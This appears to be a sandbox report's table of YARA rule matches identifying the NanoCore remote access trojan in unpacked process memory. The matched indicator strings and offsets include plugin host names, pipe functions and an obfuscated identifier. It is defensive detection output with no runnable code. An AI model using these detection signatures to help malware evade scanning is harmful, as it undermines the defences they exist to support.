0.2.wIQLBHYbqz.exe.3918578.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.3.RMActivate_isv.exe.bat.3668768.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.3.RMActivate_isv.exe.bat.3668768.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.wIQLBHYbqz.exe.3918578.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.3.RMActivate_isv.exe.bat.3668768.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.3.RMActivate_isv.exe.bat.3668768.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
0.2.wIQLBHYbqz.exe.3918578.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.3.RMActivate_isv.exe.bat.3668768.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.3.RMActivate_isv.exe.bat.3668768.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.wIQLBHYbqz.exe.3918578.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.3.RMActivate_isv.exe.bat.3668768.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.3.RMActivate_isv.exe.bat.3668768.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
13.2.RegAsm.exe.5b70000.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
13.2.RegAsm.exe.5b70000.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
13.2.RegAsm.exe.5b70000.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.RegAsm.exe.40ce424.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28269:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x28296:$x2: IClientNetworkHost
22.2.RegAsm.exe.40ce424.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x28269:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x29344:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x28283:$s5: IClientLoggingHost
22.2.RegAsm.exe.40ce424.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.wIQLBHYbqz.exe.3918578.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.wIQLBHYbqz.exe.3918578.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.wIQLBHYbqz.exe.3918578.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.wIQLBHYbqz.exe.3918578.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
0.3.wIQLBHYbqz.exe.39cb008.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf1fd:$x1: NanoCore.ClientPluginHost 0xf23a:$x2: IClientNetworkHost 0x12d6d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.3.wIQLBHYbqz.exe.39cb008.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xef75:$x1: NanoCore Client.exe 0xf1fd:$x2: NanoCore.ClientPluginHost 0x10836:$s1: PluginCommand 0x1082a:$s2: FileCommand 0x116db:$s3: PipeExists 0x17492:$s4: PipeCreated 0xf227:$s5: IClientLoggingHost
0.3.wIQLBHYbqz.exe.39cb008.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.3.wIQLBHYbqz.exe.39cb008.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xef65:$a: NanoCore 0xef75:$a: NanoCore 0xf1a9:$a: NanoCore 0xf1bd:$a: NanoCore 0xf1fd:$a: NanoCore 0xefc4:$b: ClientPlugin 0xf1c6:$b: ClientPlugin 0xf206:$b: ClientPlugin 0xf0eb:$c: ProjectData 0xfaf2:$d: DESCrypto 0x174be:$e: KeepAlive 0x154ac:$g: LogClientMessage 0x116a7:$i: get_Connected 0xfe28:$j: #=q 0xfe58:$j: #=q 0xfe74:$j: #=q 0xfea4:$j: #=q 0xfec0:$j: #=q 0xfedc:$j: #=q 0xff0c:$j: #=q 0xff28:$j: #=q
14.3.RMActivate_isv.exe.bat.3668768.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.3.RMActivate_isv.exe.bat.3668768.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.3.RMActivate_isv.exe.bat.3668768.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.3.RMActivate_isv.exe.bat.3668768.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0.2.wIQLBHYbqz.exe.39cb008.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.wIQLBHYbqz.exe.39cb008.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.2.wIQLBHYbqz.exe.39cb008.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.wIQLBHYbqz.exe.39cb008.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0.3.wIQLBHYbqz.exe.39cbe78.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x39f97:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.3.wIQLBHYbqz.exe.39cbe78.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.3.wIQLBHYbqz.exe.39cbe78.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.3.wIQLBHYbqz.exe.39cbe78.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x3c58c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q
0.3.wIQLBHYbqz.exe.39cbe78.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x39f97:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.3.wIQLBHYbqz.exe.39cbe78.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.3.wIQLBHYbqz.exe.39cbe78.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.3.wIQLBHYbqz.exe.39cbe78.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x3c58c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q
14.2.RMActivate_isv.exe.bat.16e0000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.RMActivate_isv.exe.bat.16e0000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.2.RMActivate_isv.exe.bat.16e0000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.RMActivate_isv.exe.bat.16e0000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0.2.wIQLBHYbqz.exe.38c4300.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.wIQLBHYbqz.exe.38c4300.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.2.wIQLBHYbqz.exe.38c4300.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.wIQLBHYbqz.exe.38c4300.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0.3.wIQLBHYbqz.exe.39cbe78.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.3.wIQLBHYbqz.exe.39cbe78.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.3.wIQLBHYbqz.exe.39cbe78.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.3.wIQLBHYbqz.exe.39cbe78.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
13.2.RegAsm.exe.424e424.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
13.2.RegAsm.exe.424e424.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
13.2.RegAsm.exe.424e424.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.wIQLBHYbqz.exe.38c4300.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.wIQLBHYbqz.exe.38c4300.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.wIQLBHYbqz.exe.38c4300.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.wIQLBHYbqz.exe.38c4300.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
14.3.RMActivate_isv.exe.bat.3668768.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.3.RMActivate_isv.exe.bat.3668768.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
14.3.RMActivate_isv.exe.bat.3668768.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.3.RMActivate_isv.exe.bat.3668768.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
0.3.wIQLBHYbqz.exe.39cb008.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.3.wIQLBHYbqz.exe.39cb008.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.3.wIQLBHYbqz.exe.39cb008.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.3.wIQLBHYbqz.exe.39cb008.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0.3.wIQLBHYbqz.exe.39cbe78.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.3.wIQLBHYbqz.exe.39cbe78.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.3.wIQLBHYbqz.exe.39cbe78.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.3.wIQLBHYbqz.exe.39cbe78.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
14.3.RMActivate_isv.exe.bat.35a0a20.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x42b95:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x42bd2:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46705:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.3.RMActivate_isv.exe.bat.35a0a20.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x4290d:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x42b95:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x441ce:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x441c2:$s2: FileCommand 0x1266b:$s3: PipeExists 0x45073:$s3: PipeExists 0x18422:$s4: PipeCreated 0x4ae2a:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost 0x42bbf:$s5: IClientLoggingHost
14.3.RMActivate_isv.exe.bat.35a0a20.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
